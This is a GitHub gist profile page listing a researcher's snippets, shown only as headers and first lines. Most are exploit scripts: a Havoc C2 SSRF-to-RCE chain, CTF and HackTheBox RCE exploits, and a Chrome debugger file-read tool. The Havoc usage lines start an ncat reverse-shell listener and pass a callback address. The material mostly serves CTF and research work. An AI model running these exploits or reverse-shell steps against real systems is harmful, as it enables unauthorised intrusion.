Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / havoc_ssrf2rce.py
Last active January 21, 2025 15:49
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
# Havoc C2 SSRF to AuthN RCE
# @author longcat (https://sth.sh)
#
# sudo ncat -lvp 443
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L
#
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE)
# Their writeups are great. I am so fascinating to read @_chebuya blog post :)
# My work is just to integrate them into one single shot exploit.
# In short, make WebSocket works with Havoc C2 Agent Payload
@pich4ya
pich4ya / bookclub_exploit_rce.py
Last active December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
#!/usr/bin/env python
# @author: longcat
# SEC Playground Bloody Xmas 2024 - Bookclub
# Exploit #2 - Read Flag w/ RCE (Reverse Shell)
import requests
import sys
import time
import argparse
import urllib3
@pich4ya
pich4ya / htb_clicker.py
Last active April 20, 2024 14:21
Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
import requests
import random
import string
import urllib.parse
from base64 import b64encode,b64decode
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
@pich4ya
pich4ya / bloodhound-python_issues.txt
Created April 16, 2024 05:13
Common solutions for Bloodhound-python errors, problems and issues
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Compiled list of my common bloodhound-python problems & solutions
Bloodhound-python Error #0
You do not get info like GPO and permission abuse edges.
You need to add option -> -c All,LoggedOn
Bloodhound-python Error #1
raise NoNameservers(request=self.request, errors=self.errors)
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL
@pich4ya
pich4ya / brain_check.py
Last active January 23, 2024 16:02
brain_check.py
# A numeric lock has a 3 digit key
# "682" - One number is correct and well placed
# "614" - One number is correct but wrongly placed
# "206" - Two number are correct but wrongly placed
# "738" - Nothing is correct
# "780" - One number is correct but wrongly placed
from z3 import *
# Create three integer variables for the lock digits
@pich4ya
pich4ya / apk_getString_R_string.py
Last active January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# I tried all jadx options for debof, but it did not work.
# This script can be used to replace strings.xml values in a target Java file
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) {
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources
import xml.etree.ElementTree as ET
import re
import sys
@pich4ya
pich4ya / vultr_nuke.sh
Created July 7, 2023 11:47
Spawn a Vultr VPS instance with zsh script
#!/usr/bin/env zsh
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ansible's Vultr module is suck. I have built my own.
# Nuke all my Vultr instances
ssh_key=$(cat ~/.ssh/id_ed25519_vultr.pub)
echo $ssh_key
# List Instances
curl "https://api.vultr.com/v2/instances" \
-X GET \
@pich4ya
pich4ya / lookingglass_ssh.txt
Created March 17, 2023 15:34
TryHackMe "Looking Glass" - Find the right port with binary search
#!/bin/zsh
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# https://tryhackme.com/room/lookingglass
# 10.10.169.23
function ssh_connect {
ssh root@10.10.169.23 -p $1 2>/dev/null | grep -q 'Higher' && echo "Higher" && exit 0
echo "Lower"
}
@pich4ya
pich4ya / weedshop_exploit.py
Last active July 3, 2023 07:12
Weed Shop RCE Exploit
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# 2023-03-07
# Weed Shop RCE Exploit
import requests
def create_dbfile(filename):
# Vulnerability 1: IP Spoofing
# File: function.php
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
import requests
import json
import urllib3
import websocket